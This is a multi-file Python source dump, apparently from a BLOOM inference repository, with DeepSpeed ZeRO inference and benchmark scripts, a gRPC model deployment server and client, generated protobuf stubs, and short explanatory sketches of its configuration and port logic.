+ input_tokens[t] = input_tokens[t].to(torch.cuda.current_device())
214
+ outputs = model.generate(**input_tokens, **generate_kwargs)
215
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
216
+ output_tokens_lengths = [x.shape[0] for x in outputs]
217
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
218
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
219
+ return zip(inputs, outputs, total_new_tokens)
220
+ print_rank0('*** Running generate warmup')
221
+ _ = generate()
222
+ print_rank0('*** Running generate')
223
+ t_generate_start = time.time()
224
+ generated = generate()
225
+ t_generate_span = time.time() - t_generate_start
226
+ for (i, o, _) in generated:
227
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
228
+ if args.benchmark:
229
+ torch.cuda.empty_cache()
230
+ gc.collect()
231
+ deepspeed.runtime.utils.see_memory_usage('end-of-run', force=True)
232
+ if args.benchmark:
233
+ print_rank0('*** Running benchmark')
234
+ for i in range(1):
235
+ _ = generate()
236
+ torch.cuda.synchronize()
237
+ t0 = time.time()
238
+ cycles = 5
239
+ total_new_tokens_generated = 0
240
+ for i in range(cycles):
241
+ generated = generate()
242
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
243
+ torch.cuda.synchronize()
244
+ throughput = (time.time() - t0) / total_new_tokens_generated
245
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
246
+
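+ # Self-contained sketch of the checkpoints.json that write_checkpoints_json()
+ # above hands to deepspeed.init_inference; the shard file names below are
+ # placeholders, not real BLOOM checkpoint names.
+ import json
+
+ example = {
+     'type': 'BLOOM',
+     'checkpoints': ['shard-00001.bin', 'shard-00002.bin'],
+     'version': 1.0,
+ }
+ with open('checkpoints.json', 'w') as f:
+     json.dump(example, f)
+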
247
+ # File: transformers-bloom-inference-main/bloom-inference-scripts/bloom-ds-zero-inference.py
248
+ import gc
249
+ import math
250
+ import os
251
+ import time
252
+ from argparse import ArgumentParser
253
+ import torch
254
+ import torch.distributed as dist
255
+ import deepspeed
256
+ from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer
257
+ from transformers.deepspeed import HfDeepSpeedConfig
258
+ from transformers.models.bloom.modeling_bloom import BloomBlock as BloomBlock
259
+ t_start = time.time()
260
+ num_tokens = 100
261
+ parser = ArgumentParser()
262
+ parser.add_argument('--name', required=True, type=str, help='model_name')
263
+ parser.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
264
+ parser.add_argument('--batch_size', default=1, type=int, help='batch size')
265
+ parser.add_argument('--benchmark', action='store_true', help='additionally run benchmark')
266
+ parser.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload')
267
+ parser.add_argument('--nvme_offload_path', help='whether to activate NVME offload and the path on nvme')
268
+ args = parser.parse_args()
269
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
270
+ world_size = int(os.getenv('WORLD_SIZE', '1'))
271
+ deepspeed.init_distributed('nccl')
272
+ rank = dist.get_rank()
273
+
274
+ def print_rank0(*msg):
275
+ if rank != 0:
276
+ return
277
+ print(*msg)
278
+ model_name = args.name
279
+ print_rank0(f'*** Loading the model {model_name}')
280
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
281
+ config = AutoConfig.from_pretrained(model_name)
282
+ dtype = torch.bfloat16 if model_name in ['bigscience/bloom', 'bigscience/bigscience-small-testing'] else torch.float16
283
+ model_hidden_size = config.hidden_size
284
+ train_batch_size = 1 * world_size
285
+ ds_config = {'fp16': {'enabled': dtype == torch.float16}, 'bf16': {'enabled': dtype == torch.bfloat16}, 'zero_optimization': {'stage': 3, 'overlap_comm': True, 'contiguous_gradients': True, 'reduce_bucket_size': model_hidden_size * model_hidden_size, 'stage3_prefetch_bucket_size': 0.9 * model_hidden_size * model_hidden_size, 'stage3_param_persistence_threshold': 0}, 'steps_per_print': 2000, 'train_batch_size': train_batch_size, 'train_micro_batch_size_per_gpu': 1, 'wall_clock_breakdown': False}
286
+ if args.cpu_offload and args.nvme_offload_path:
287
+ raise ValueError('Use one of --cpu_offload or --nvme_offload_path and not both')
288
+ if args.cpu_offload:
289
+ ds_config['zero_optimization']['offload_param'] = dict(device='cpu', pin_memory=True)
290
+ if args.nvme_offload_path:
291
+ ds_config['zero_optimization']['offload_param'] = dict(device='nvme', pin_memory=True, nvme_path=args.nvme_offload_path, buffer_size=4000000000.0)
292
+ dschf = HfDeepSpeedConfig(ds_config)
293
+ if args.benchmark:
294
+ torch.cuda.empty_cache()
295
+ gc.collect()
296
+ deepspeed.runtime.utils.see_memory_usage('pre-from-pretrained', force=True)
297
+ model = AutoModelForCausalLM.from_pretrained(model_name, torch_dtype=torch.bfloat16)
298
+ if args.benchmark:
299
+ deepspeed.runtime.utils.see_memory_usage('post-from-pretrained', force=True)
300
+ model = model.eval()
301
+ print_rank0(ds_config)
302
+ ds_engine = deepspeed.initialize(model=model, config_params=ds_config)[0]
303
+ ds_engine.module.eval()
304
+ model = ds_engine.module
305
+ if args.benchmark:
306
+ t_ready = time.time()
307
+ deepspeed.runtime.utils.see_memory_usage('start-of-generate', force=True)
308
+ print_rank0(f'*** Starting to generate {num_tokens} tokens with bs={args.batch_size}')
309
+ input_sentences = ['DeepSpeed is a machine learning framework', 'He is working on', 'He has a', 'He got all', 'Everyone is happy and I can', 'The new movie that got Oscar this year', 'In the far far distance from our galaxy,', 'Peace is the only way']
310
+ if args.batch_size > len(input_sentences):
311
+ input_sentences *= math.ceil(args.batch_size / len(input_sentences))
312
+ generate_kwargs = dict(max_new_tokens=num_tokens, do_sample=False)
313
+ print_rank0(f'Generate args {generate_kwargs}')
314
+ inputs = input_sentences[:args.batch_size]
315
+
316
+ def generate():
317
+ input_tokens = tokenizer.batch_encode_plus(inputs, return_tensors='pt', padding=True)
318
+ for t in input_tokens:
319
+ if torch.is_tensor(input_tokens[t]):
320
+ input_tokens[t] = input_tokens[t].to(torch.cuda.current_device())
321
+ outputs = model.generate(**input_tokens, **generate_kwargs)
322
+ input_tokens_lengths = [x.shape[0] for x in input_tokens.input_ids]
323
+ output_tokens_lengths = [x.shape[0] for x in outputs]
324
+ total_new_tokens = [o - i for (i, o) in zip(input_tokens_lengths, output_tokens_lengths)]
325
+ outputs = tokenizer.batch_decode(outputs, skip_special_tokens=True)
326
+ return zip(inputs, outputs, total_new_tokens)
327
+ print_rank0('*** Running generate')
328
+ t_generate_start = time.time()
329
+ pairs = generate()
330
+ t_generate_span = time.time() - t_generate_start
331
+ for (i, o, _) in pairs:
332
+ print_rank0(f"{'-' * 60}\nin={i}\nout={o}\n")
333
+ if args.benchmark:
334
+ torch.cuda.empty_cache()
335
+ gc.collect()
336
+ deepspeed.runtime.utils.see_memory_usage('end-of-generate', force=True)
337
+ print_rank0('*** Running benchmark')
338
+ for i in range(1):
339
+ _ = generate()
340
+ torch.cuda.synchronize()
341
+ t0 = time.time()
342
+ cycles = 5
343
+ total_new_tokens_generated = 0
344
+ for i in range(cycles):
345
+ generated = generate()
346
+ total_new_tokens_generated += sum((new_tokens for (_, _, new_tokens) in generated))
347
+ torch.cuda.synchronize()
348
+ total_new_tokens_generated *= world_size
349
+ throughput = (time.time() - t0) / total_new_tokens_generated
350
+ print_rank0(f'\n*** Performance stats:\nThroughput per token including tokenize: {throughput * 1000:.2f} msecs\nStart to ready to generate: {t_ready - t_start:.3f} secs\nTokenize and generate {total_new_tokens_generated} (bs={args.batch_size}) tokens: {t_generate_span:.3f} secs\nStart to finish: {t_ready - t_start + t_generate_span:.3f} secs\n')
351
+
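+ # The ZeRO stage-3 bucket sizes in ds_config above scale with the model's
+ # hidden size; a small helper restating that relationship. hidden_size=14336
+ # (BLOOM-176B) is used purely as an example value.
+ def zero3_bucket_sizes(hidden_size):
+     return {
+         'reduce_bucket_size': hidden_size * hidden_size,
+         'stage3_prefetch_bucket_size': 0.9 * hidden_size * hidden_size,
+         'stage3_param_persistence_threshold': 0,
+     }
+
+ print(zero3_bucket_sizes(14336))
+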
352
+ # File: transformers-bloom-inference-main/inference_server/benchmark.py
353
+ import argparse
354
+ import gc
355
+ from functools import partial
356
+ import torch
357
+ from .constants import DS_INFERENCE, DS_ZERO
358
+ from .model_handler.deployment import ModelDeployment
359
+ from .models import start_inference_engine
360
+ from .utils import GenerateRequest, create_generate_request, get_argument_parser, get_dummy_batch, get_world_size, parse_args, print_rank_0, run_and_log_time
361
+
362
+ def benchmark_generation(model: ModelDeployment, request: GenerateRequest, cycles: int=5):
363
+ total_new_tokens_generated = 0
364
+ for _ in range(cycles):
365
+ response = model.generate(request=request)
366
+ total_new_tokens_generated += sum((new_tokens for new_tokens in response.num_generated_tokens))
367
+ return total_new_tokens_generated
368
+
369
+ def get_benchmark_results(benchmark_time: float, initialization_time: float, total_new_tokens_generated: int, batch_size: int, cycles: int) -> str:
370
+ throughput = total_new_tokens_generated / benchmark_time
371
+ latency = benchmark_time / cycles
372
+ return f'\n*** Performance stats:\nThroughput (including tokenization) = {throughput:.2f} tokens/sec\nThroughput (including tokenization) = {1000 / throughput:.2f} msecs/token\nModel loading time = {initialization_time:.2f} secs\nTotal tokens generated = {total_new_tokens_generated} with batch size = {batch_size}\nLatency = {latency:.2f} secs\nModel loading time + generation time per batch = {initialization_time + latency:.2f} secs\n'
373
+
374
+ def benchmark_end_to_end(args: argparse.Namespace) -> None:
375
+ (model, initialization_time) = run_and_log_time(partial(ModelDeployment, args=args, grpc_allowed=False))
376
+ request = create_generate_request(get_dummy_batch(args.batch_size), args.generate_kwargs)
377
+ print_rank_0(f'generate_kwargs = {args.generate_kwargs}')
378
+ print_rank_0(f'batch_size = {args.batch_size}')
379
+ response = model.generate(request=request)
380
+ for (i, (o, _)) in zip(request.text, zip(response.text, response.num_generated_tokens)):
381
+ print_rank_0(f"{'-' * 60}\nin = {i}\nout = {o}\n")
382
+ if args.benchmark_cycles > 0:
383
+ print_rank_0('*** Running benchmark')
384
+ torch.cuda.empty_cache()
385
+ gc.collect()
386
+ model.generate(request=request)
387
+ torch.cuda.synchronize()
388
+ (total_new_tokens_generated, benchmark_time) = run_and_log_time(partial(benchmark_generation, model=model, request=request, cycles=args.benchmark_cycles))
389
+ if args.deployment_framework == DS_ZERO:
390
+ total_new_tokens_generated *= get_world_size()
391
+ print_rank_0(get_benchmark_results(benchmark_time, initialization_time, total_new_tokens_generated, args.batch_size, args.benchmark_cycles))
392
+
393
+ def get_args() -> argparse.Namespace:
394
+ parser = get_argument_parser()
395
+ group = parser.add_argument_group(title='launch config')
396
+ group.add_argument('--benchmark_cycles', type=int, default=0, help='additionally run benchmark')
397
+ group.add_argument('--local_rank', required=False, type=int, help='used by dist launchers')
398
+ group.add_argument('--batch_size', default=1, type=int, help='batch size')
399
+ group.add_argument('--cpu_offload', action='store_true', help='whether to activate CPU offload for DS ZeRO')
400
+ args = parse_args(parser)
401
+ launched_with_deepspeed = args.deployment_framework in [DS_INFERENCE, DS_ZERO]
402
+ assert args.max_batch_size == None, 'max_batch_size is not supported with benchmark'
403
+ if not launched_with_deepspeed:
404
+ assert args.local_rank == None, 'local_rank must be None if not launched with DeepSpeed'
405
+ if args.cpu_offload:
406
+ assert args.deployment_framework == DS_ZERO, 'cpu_offload only works with DS_ZeRO'
407
+ return args
408
+
409
+ def main() -> None:
410
+ args = get_args()
411
+ start_inference_engine(args.deployment_framework)
412
+ benchmark_end_to_end(args)
413
+ if __name__ == '__main__':
414
+ main()
415
+
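+ # benchmark.py above imports run_and_log_time() from ..utils, which is not
+ # reproduced here. A minimal stand-in with the signature the call sites imply
+ # (callable in, (result, elapsed_seconds) out) -- an assumption for
+ # illustration, not the repository's actual helper.
+ import time
+ from functools import partial
+
+ def run_and_log_time_sketch(fn):
+     start = time.time()
+     result = fn()
+     return result, time.time() - start
+
+ result, elapsed = run_and_log_time_sketch(partial(sum, range(1_000_000)))
+ print(result, f'{elapsed:.4f}s')
+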
416
+ # File: transformers-bloom-inference-main/inference_server/cli.py
417
+ import argparse
418
+ import json
419
+ import sys
420
+ from .model_handler import ModelDeployment
421
+ from .utils import get_argument_parser, parse_args, print_rank_0
422
+
423
+ def get_args() -> argparse.Namespace:
424
+ parser = get_argument_parser()
425
+ args = parse_args(parser)
426
+ return args
427
+
428
+ def main() -> None:
429
+ args = get_args()
430
+ model = ModelDeployment(args, True)
431
+ generate_kwargs = args.generate_kwargs
432
+ while True:
433
+ input_text = input('Input text: ')
434
+ if input('change generate_kwargs? [y/n] ') == 'y':
435
+ while True:
436
+ try:
437
+ generate_kwargs = json.loads(input('Generate kwargs: '))
438
+ break
439
+ except Exception as e:
440
+ (e_type, e_message, _) = sys.exc_info()
441
+ print('error =', e_type.__name__)
442
+ print('message =', e_message)
443
+ continue
444
+ response = model.generate(text=[input_text], generate_kwargs=generate_kwargs)
445
+ print_rank_0('Output text:', response.text[0])
446
+ print_rank_0('Generated tokens:', response.num_generated_tokens[0])
447
+ if __name__ == '__main__':
448
+ main()
449
+
450
+ # File: transformers-bloom-inference-main/inference_server/download_model.py
451
+ import argparse
452
+ from inference_server.models import get_hf_model_class
453
+ from transformers import AutoConfig, AutoTokenizer
454
+
455
+ def get_args() -> argparse.Namespace:
456
+ parser = argparse.ArgumentParser()
457
+ parser.add_argument('--model_name', type=str, required=True, help='model to use')
458
+ parser.add_argument('--model_class', type=str, required=True, help='model class to use')
459
+ args = parser.parse_args()
460
+ return args
461
+
462
+ def main() -> None:
463
+ args = get_args()
464
+ print('downloading', args.model_name)
465
+ AutoConfig.from_pretrained(args.model_name)
466
+ AutoTokenizer.from_pretrained(args.model_name)
467
+ get_hf_model_class(args.model_class).from_pretrained(args.model_name)
468
+ if __name__ == '__main__':
469
+ main()
470
+
471
+ # File: transformers-bloom-inference-main/inference_server/model_handler/deployment.py
472
+ """"""
473
+ import argparse
474
+ import asyncio
475
+ import subprocess
476
+ import time
477
+ from typing import List
478
+ import grpc
479
+ from ..constants import DS_INFERENCE, DS_ZERO
480
+ from ..models import get_model_class, load_tokenizer
481
+ from ..utils import ForwardRequest, ForwardResponse, GenerateResponse, TokenizeRequest, TokenizeResponse, create_generate_request, get_cuda_visible_devices, get_str_dtype, get_world_size, print_rank_0
482
+ from .grpc_utils.pb import generation_pb2, generation_pb2_grpc
483
+
484
+ class ModelDeployment:
485
+
486
+ def __init__(self, args: argparse.Namespace, grpc_allowed: bool=False):
487
+ self.cuda_visible_devices = get_cuda_visible_devices()
488
+ self.num_gpus = get_world_size()
489
+ self.use_grpc_server = self.should_use_grpc(args.deployment_framework, grpc_allowed)
490
+ if self.use_grpc_server:
491
+ self.tokenizer = load_tokenizer(args.model_name)
492
+ self.initialize_ports()
493
+ self.dtype_proto_field = {str: 'svalue', int: 'ivalue', float: 'fvalue', bool: 'bvalue'}
494
+ self._initialize_service(args)
495
+ self._wait_until_server_is_live()
496
+ self.asyncio_loop = asyncio.get_event_loop()
497
+ self._initialize_grpc_client()
498
+ else:
499
+ self.model = get_model_class(args.deployment_framework)(args)
500
+ print_rank_0('model loaded')
501
+
502
+ def should_use_grpc(self, deployment_framework: str, grpc_allowed: bool) -> bool:
503
+ if grpc_allowed and get_world_size() > 1:
504
+ return deployment_framework in [DS_INFERENCE, DS_ZERO]
505
+ return False
506
+
507
+ def initialize_ports(self):
508
+ self.ports = []
509
+ for i in range(self.num_gpus):
510
+ self.ports.append(50950 + self.cuda_visible_devices[i])
511
+
512
+ def _is_socket_open(self, port):
513
+ import socket
514
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
515
+ result = sock.connect_ex(('0.0.0.0', port))
516
+ sock.close()
517
+ return result == 0
518
+
519
+ def _is_server_process_alive(self):
520
+ if self.process is None:
521
+ return True
522
+ try:
523
+ self.process.wait(1)
524
+ except subprocess.TimeoutExpired as err:
525
+ is_alive = True
526
+ else:
527
+ is_alive = False
528
+ return is_alive
529
+
530
+ def _wait_until_server_is_live(self):
531
+ sockets_open = False
532
+ while not sockets_open:
533
+ sockets_open = self._is_socket_open(self.ports[0])
534
+ process_alive = self._is_server_process_alive()
535
+ if not process_alive:
536
+ raise RuntimeError('server crashed for some reason, unable to proceed')
537
+ time.sleep(4)
538
+ print_rank_0('waiting for server to start...')
539
+ print_rank_0(f'server has started on {self.ports[0]}')
540
+
541
+ def dict_to_proto(self, generate_kwargs: dict) -> dict:
542
+ result = {}
543
+ for (k, v) in generate_kwargs.items():
544
+ if v is not None:
545
+ x = generation_pb2.Value()
546
+ setattr(x, self.dtype_proto_field[type(v)], v)
547
+ result[k] = x
548
+ return result
549
+
550
+ def _initialize_service(self, args: argparse.Namespace):
551
+ if self._is_socket_open(self.ports[0]):
552
+ raise RuntimeError(f'Server is already running on port {self.ports}, please shutdown or use different port.')
553
+ if args.deployment_framework in [DS_INFERENCE, DS_ZERO]:
554
+ ports = ' '.join(map(str, self.ports))
555
+ cmd = f'inference_server.model_handler.launch --model_name {args.model_name} --deployment_framework {args.deployment_framework} --dtype {get_str_dtype(args.dtype)} --port {ports} --model_class {args.model_class}'
556
+ if args.max_batch_size is not None:
557
+ cmd += f' --max_batch_size {args.max_batch_size}'
558
+ if args.max_input_length is not None:
559
+ cmd += f' --max_input_length {args.max_input_length}'
560
+ master_port = 29500 + min(self.cuda_visible_devices)
561
+ cuda_visible_devices = ','.join(map(str, self.cuda_visible_devices))
562
+ cmd = f'deepspeed --master_port {master_port} --include localhost:{cuda_visible_devices} --module {cmd}'
563
+ else:
564
+ raise NotImplementedError(f'unsupported deployment_framework: {args.deployment_framework}')
565
+ cmd = cmd.split(' ')
566
+ self.process = subprocess.Popen(cmd)
567
+
568
+ def _initialize_grpc_client(self):
569
+ self.stubs = []
570
+ for i in self.ports:
571
+ channel = grpc.aio.insecure_channel(f'localhost:{i}')
572
+ stub = generation_pb2_grpc.GenerationServiceStub(channel)
573
+ self.stubs.append(stub)
574
+
575
+ async def generate_in_tensor_parallel(self, text: List[str], generate_kwargs: dict):
576
+ responses = []
577
+ for i in range(self.num_gpus):
578
+ responses.append(self.asyncio_loop.create_task(self.generate_async(i, text, generate_kwargs)))
579
+ await responses[0]
580
+ return responses[0]
581
+
582
+ async def generate_async(self, stub_id: int, text: List[str], generate_kwargs: dict):
583
+ req = generation_pb2.GenerationRequestProto(texts=text, generate_kwargs=generate_kwargs)
584
+ response = await self.stubs[stub_id].Generate(req)
585
+ return response
586
+
587
+ async def forward_in_tensor_parallel(self, conditioning_text: List[str], response: List[str]):
588
+ responses = []
589
+ for i in range(self.num_gpus):
590
+ responses.append(self.asyncio_loop.create_task(self.forward_async(i, conditioning_text, response)))
591
+ await responses[0]
592
+ return responses[0]
593
+
594
+ async def forward_async(self, stub_id: int, conditioning_text: List[str], response: List[str]):
595
+ req = generation_pb2.ForwardRequestProto(conditioning_text=conditioning_text, response=response)
596
+ response = await self.stubs[stub_id].Forward(req)
597
+ return response
598
+
599
+ def generate(self, **kwargs) -> GenerateResponse:
600
+ if self.use_grpc_server:
601
+ if 'request' in kwargs:
602
+ text = kwargs['request'].text
603
+ generate_kwargs = kwargs['request'].get_generate_kwargs()
604
+ else:
605
+ text = kwargs['text']
606
+ generate_kwargs = kwargs['generate_kwargs']
607
+ generate_kwargs = self.dict_to_proto(generate_kwargs)
608
+ response = self.asyncio_loop.run_until_complete(self.generate_in_tensor_parallel(text, generate_kwargs)).result()
609
+ if response.error:
610
+ raise Exception(response.error)
611
+ else:
612
+ return GenerateResponse(text=[r for r in response.texts], num_generated_tokens=[n for n in response.num_generated_tokens])
613
+ else:
614
+ if 'request' in kwargs:
615
+ request = kwargs['request']
616
+ else:
617
+ request = create_generate_request(**kwargs)
618
+ response = self.model.generate(request)
619
+ if isinstance(response, Exception):
620
+ raise response
621
+ else:
622
+ return response
623
+
624
+ def forward(self, request: ForwardRequest) -> ForwardResponse:
625
+ if self.use_grpc_server:
626
+ response = self.asyncio_loop.run_until_complete(self.forward_in_tensor_parallel(request.conditioning_text, request.response)).result()
627
+ if response.error:
628
+ raise Exception(response.error)
629
+ else:
630
+ return ForwardResponse(nll=response.nll)
631
+ else:
632
+ response = self.model.forward(request)
633
+ if isinstance(response, Exception):
634
+ raise response
635
+ else:
636
+ return response
637
+
638
+ def tokenize(self, request: TokenizeRequest) -> TokenizeResponse:
639
+ if self.use_grpc_server:
640
+ response = self.tokenizer(request.text, padding=request.padding)
641
+ response = TokenizeResponse(token_ids=response.input_ids, attention_mask=response.attention_mask)
642
+ else:
643
+ response = self.model.tokenize(request)
644
+ return response
645
+
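+ # Restating the port scheme used by ModelDeployment above: one gRPC port per
+ # visible GPU (50950 + device index) and a DeepSpeed master port derived from
+ # the lowest device index. The device list is an example.
+ cuda_visible_devices = [2, 3]
+ grpc_ports = [50950 + d for d in cuda_visible_devices]
+ master_port = 29500 + min(cuda_visible_devices)
+ print(grpc_ports, master_port)  # [50952, 50953] 29502
+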
646
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/generation_server.py
647
+ import os
648
+ from concurrent import futures
649
+ import torch
650
+ import grpc
651
+ from ...models import Model
652
+ from ...utils import ForwardRequest, TokenizeRequest, create_generate_request, print_rank_0
653
+ from .pb import generation_pb2, generation_pb2_grpc
654
+
655
+ class GenerationServer(generation_pb2_grpc.GenerationServiceServicer):
656
+
657
+ def __init__(self, model: Model) -> None:
658
+ self.model = model
659
+
660
+ def _unpack_proto_query_kwargs(self, query_kwargs):
661
+ query_kwargs = {k: getattr(v, v.WhichOneof('oneof_values')) for (k, v) in query_kwargs.items()}
662
+ return query_kwargs
663
+
664
+ def Generate(self, request, context):
665
+ text = [r for r in request.texts]
666
+ generate_kwargs = self._unpack_proto_query_kwargs(request.generate_kwargs)
667
+ request = create_generate_request(text=text, generate_kwargs=generate_kwargs)
668
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
669
+ torch.cuda.set_device(local_rank)
670
+ self.model.input_device = local_rank
671
+ response = self.model.generate(request)
672
+ if isinstance(response, Exception):
673
+ response = generation_pb2.GenerationResponseProto(error=str(response), is_encoder_decoder=response.is_encoder_decoder)
674
+ else:
675
+ response = generation_pb2.GenerationResponseProto(texts=response.text, num_generated_tokens=response.num_generated_tokens, is_encoder_decoder=response.is_encoder_decoder)
676
+ return response
677
+
678
+ def Forward(self, request, context):
679
+ conditioning_text = [r for r in request.conditioning_text]
680
+ response = [r for r in request.response]
681
+ request = ForwardRequest(conditioning_text=conditioning_text, response=response)
682
+ local_rank = int(os.getenv('LOCAL_RANK', '0'))
683
+ torch.cuda.set_device(local_rank)
684
+ self.model.input_device = local_rank
685
+ response = self.model.forward(request)
686
+ if isinstance(response, Exception):
687
+ response = generation_pb2.ForwardResponseProto(error=str(response), is_encoder_decoder=response.is_encoder_decoder)
688
+ else:
689
+ response = generation_pb2.ForwardResponseProto(nll=response.nll, is_encoder_decoder=response.is_encoder_decoder)
690
+ return response
691
+
692
+ def serve(inference_pipeline, port):
693
+ server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))
694
+ generation_pb2_grpc.add_GenerationServiceServicer_to_server(GenerationServer(inference_pipeline), server)
695
+ server.add_insecure_port(f'[::]:{port}')
696
+ print_rank_0('About to start server')
697
+ server.start()
698
+ print_rank_0('Started')
699
+ server.wait_for_termination()
700
+
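+ # deployment.py packs generate_kwargs into proto Values keyed by Python type
+ # (svalue/ivalue/fvalue/bvalue) and GenerationServer unpacks them with
+ # WhichOneof('oneof_values'). A plain-dict analogue of that round trip, kept
+ # free of grpc/protobuf so it runs standalone.
+ dtype_proto_field = {str: 'svalue', int: 'ivalue', float: 'fvalue', bool: 'bvalue'}
+
+ def pack(kwargs):
+     return {k: {dtype_proto_field[type(v)]: v} for k, v in kwargs.items() if v is not None}
+
+ def unpack(packed):
+     return {k: next(iter(v.values())) for k, v in packed.items()}
+
+ packed = pack({'max_new_tokens': 100, 'do_sample': False, 'top_p': None})
+ print(packed)          # {'max_new_tokens': {'ivalue': 100}, 'do_sample': {'bvalue': False}}
+ print(unpack(packed))  # {'max_new_tokens': 100, 'do_sample': False}
+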
701
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/pb/generation_pb2.py
702
+ """"""
703
+ from google.protobuf import descriptor as _descriptor
704
+ from google.protobuf import descriptor_pool as _descriptor_pool
705
+ from google.protobuf import symbol_database as _symbol_database
706
+ from google.protobuf.internal import builder as _builder
707
+ _sym_db = _symbol_database.Default()
708
+ DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x10generation.proto\x12\ngeneration"_\n\x05Value\x12\x10\n\x06svalue\x18\x01 \x01(\tH\x00\x12\x10\n\x06ivalue\x18\x02 \x01(\x03H\x00\x12\x10\n\x06fvalue\x18\x03 \x01(\x02H\x00\x12\x10\n\x06bvalue\x18\x04 \x01(\x08H\x00B\x0e\n\x0coneof_values"\xc2\x01\n\x16GenerationRequestProto\x12\r\n\x05texts\x18\x01 \x03(\t\x12O\n\x0fgenerate_kwargs\x18\x02 \x03(\x0b26.generation.GenerationRequestProto.GenerateKwargsEntry\x1aH\n\x13GenerateKwargsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12 \n\x05value\x18\x02 \x01(\x0b2\x11.generation.Value:\x028\x01"q\n\x17GenerationResponseProto\x12\r\n\x05texts\x18\x01 \x03(\t\x12\x1c\n\x14num_generated_tokens\x18\x02 \x03(\x05\x12\r\n\x05error\x18\x03 \x01(\t\x12\x1a\n\x12is_encoder_decoder\x18\x04 \x01(\x08"B\n\x13ForwardRequestProto\x12\x19\n\x11conditioning_text\x18\x01 \x03(\t\x12\x10\n\x08response\x18\x02 \x03(\t"N\n\x14ForwardResponseProto\x12\x0b\n\x03nll\x18\x01 \x01(\x02\x12\r\n\x05error\x18\x02 \x01(\t\x12\x1a\n\x12is_encoder_decoder\x18\x03 \x01(\x082\xba\x01\n\x11GenerationService\x12U\n\x08Generate\x12".generation.GenerationRequestProto\x1a#.generation.GenerationResponseProto"\x00\x12N\n\x07Forward\x12\x1f.generation.ForwardRequestProto\x1a .generation.ForwardResponseProto"\x00b\x06proto3')
709
+ _builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals())
710
+ _builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'generation_pb2', globals())
711
+ if _descriptor._USE_C_DESCRIPTORS == False:
712
+ DESCRIPTOR._options = None
713
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._options = None
714
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_options = b'8\x01'
715
+ _VALUE._serialized_start = 32
716
+ _VALUE._serialized_end = 127
717
+ _GENERATIONREQUESTPROTO._serialized_start = 130
718
+ _GENERATIONREQUESTPROTO._serialized_end = 324
719
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_start = 252
720
+ _GENERATIONREQUESTPROTO_GENERATEKWARGSENTRY._serialized_end = 324
721
+ _GENERATIONRESPONSEPROTO._serialized_start = 326
722
+ _GENERATIONRESPONSEPROTO._serialized_end = 439
723
+ _FORWARDREQUESTPROTO._serialized_start = 441
724
+ _FORWARDREQUESTPROTO._serialized_end = 507
725
+ _FORWARDRESPONSEPROTO._serialized_start = 509
726
+ _FORWARDRESPONSEPROTO._serialized_end = 587
727
+ _GENERATIONSERVICE._serialized_start = 590
728
+ _GENERATIONSERVICE._serialized_end = 776
729
+
730
+ # File: transformers-bloom-inference-main/inference_server/model_handler/grpc_utils/pb/generation_pb2_grpc.py
731
+ """"""
732
+ import grpc
733
+ from . import generation_pb2 as generation__pb2
734
+
735
+ class GenerationServiceStub(object):
736
+
737
+ def __init__(self, channel):
738
+ self.Generate = channel.unary_unary('/generation.GenerationService/Generate', request_serializer=generation__pb2.GenerationRequestProto.SerializeToString, response_deserializer=generation__pb2.GenerationResponseProto.FromString)
739
+ self.Forward = channel.unary_unary('/generation.GenerationService/Forward', request_serializer=generation__pb2.ForwardRequestProto.SerializeToString, response_deserializer=generation__pb2.ForwardResponseProto.FromString)
740
+
741
+ class GenerationServiceServicer(object):
742
+
743
+ def Generate(self, request, context):
744
+ context.set_code(grpc.StatusCode.UNIMPLEMENTED)
745
+ context.set_details('Method not implemented!')
746
+ raise NotImplementedError('Method not implemented!')
747
+
748
+ def Forward(self, request, context):
749
+ context.set_code(grpc.StatusCode.UNIMPLEMENTED)
750
+ context.set_details('Method not implemented!')
751
+ raise NotImplementedError('Method not implemented!')
752
+
753
+ def add_GenerationServiceServicer_to_server(servicer, server):
754
+ rpc_method_handlers = {'Generate': grpc.unary_unary_rpc_method_handler(servicer.Generate, request_deserializer=generation__pb2.GenerationRequestProto.FromString, response_serializer=generation__pb2.GenerationResponseProto.SerializeToString), 'Forward': grpc.unary_unary_rpc_method_handler(servicer.Forward, request_deserializer=generation__pb2.ForwardRequestProto.FromString, response_serializer=generation__pb2.ForwardResponseProto.SerializeToString)}
755
+ generic_handler = grpc.method_handlers_generic_handler('generation.GenerationService', rpc_method_handlers)
756
+ server.add_generic_rpc_handlers((generic_handler,))
757
+
758
+ class GenerationService(object):
759
+
760
+ @staticmethod
761
+ def Generate(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
762
+ return grpc.experimental.unary_unary(request, target, '/generation.GenerationService/Generate', generation__pb2.GenerationRequestProto.SerializeToString, generation__pb2.GenerationResponseProto.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
763
+
764
+ @staticmethod
765
